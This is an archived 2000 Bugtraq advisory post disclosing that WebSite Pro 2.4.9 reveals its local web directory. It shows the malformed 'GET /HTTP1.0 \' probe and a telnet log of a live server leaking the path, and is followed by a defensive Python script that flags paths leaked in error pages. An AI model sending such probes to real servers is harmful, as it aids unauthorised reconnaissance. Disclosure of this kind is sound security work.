[13345] in bugtraq


Re: WebSitePro/2.3.18 + 2.4.9 is revealing Webdirectories

daemon@ATHENA.MIT.EDU (Lark Lizerman)
Fri Jan 14 21:50:37 2000

Message-Id:  <00f001bf5e58$112c1d60$beffcd98@u1u7p1>
Date:         Thu, 13 Jan 2000 22:23:45 -0800
Reply-To: Lark Lizerman <webmaster@DOC2000.DE>
From: Lark Lizerman <webmaster@DOC2000.DE>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

I got a tip from Noah Rathaus about the latest version of WebSite Pro (2.4.9). He mentioned a server
where WebSite Pro 2.4.9 is run.
I discovered that the latest version is also vulnerable to the bug of revealing web directories.
In the new version a change must be made to retrieve the directory name.

When you connect to a server send the command line:

GET /HTTP1.0 \

You now have to add a space before the last backspace of the command line.
That makes the server respond with a "404" error and print the directory name.


Here is the part from the logfile of Windows Telnet Client:

website.oreilly.com:
----------------------------------------------------start-------------------------------------------------------

GET /HTTP1.0 \

HTTP/1.0 404 Not Found
Date: Thu, 13 Jan 2000 20:47:12 GMT
Server: WebSitePro/2.4.9
Accept-ranges: bytes
Content-type: text/html
Content-length: 216

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
                                               <BODY bgcolor="White"><H2>404 Not
 Found</H2>
           The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c
:\1Web\docs\website\HTTP1.0)</CODE><P>
                                      </BODY></HTML>
--------------------------------------------------end--------------------------------------------------------

Here it shows us the directory "c:\1Web\docs\website\".


Status: Vendor contacted and informed about the bug.
Expecting statement about fix.

-------------------------------
Lark Lizerman
Contact:
Lark82@hotmail.com
or
webmaster@doc2000.de
-------------------------------
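
Added example (not part of the original post and not WebSite Pro code): a Python check that a defender could run over captured error responses to flag local filesystem paths leaking in the body, as in the 404 quoted above. The function names, the regular expression and the abridged sample response are assumptions constructed for illustration.

```python
import re

# Constructed sample: the 404 quoted in the post, abridged, with the telnet
# client's hard line wrap kept (it splits "c" from ":\1Web...").
SAMPLE_RESPONSE = (
    "HTTP/1.0 404 Not Found\r\n"
    "Server: WebSitePro/2.4.9\r\n"
    "Content-type: text/html\r\n"
    "\r\n"
    "<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>\r\n"
    "<BODY bgcolor=\"White\"><H2>404 Not\r\n Found</H2>\r\n"
    "The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c\r\n"
    ":\\1Web\\docs\\website\\HTTP1.0)</CODE><P>\r\n"
    "</BODY></HTML>\r\n"
)

# Drive-letter path (c:\dir\file) or UNC path (\\host\share\dir).
WIN_PATH = re.compile(
    r"(?:\b[A-Za-z]:|\\\\[\w.$-]+\\[\w.$-]+)(?:\\[\w.$ -]+)+"
)

def split_response(raw):
    """Split a raw HTTP response into (status code or None, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    return status, body

def leaked_paths(raw):
    """Return (status, paths) for local paths exposed in an error body."""
    status, body = split_response(raw)
    if status is None or status < 400:
        return status, []          # only error pages are examined here
    # Undo hard line wraps from a terminal capture so a path split across
    # two lines is matched whole, then replace markup with spaces.
    unwrapped = re.sub(r"\r?\n", "", body)
    text = re.sub(r"<[^>]+>", " ", unwrapped)
    found = {m.group(0).rstrip() for m in WIN_PATH.finditer(text)}
    return status, sorted(found)

if __name__ == "__main__":
    code, paths = leaked_paths(SAMPLE_RESPONSE)
    for p in paths:
        print(f"{code} response discloses local path: {p}")
```
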

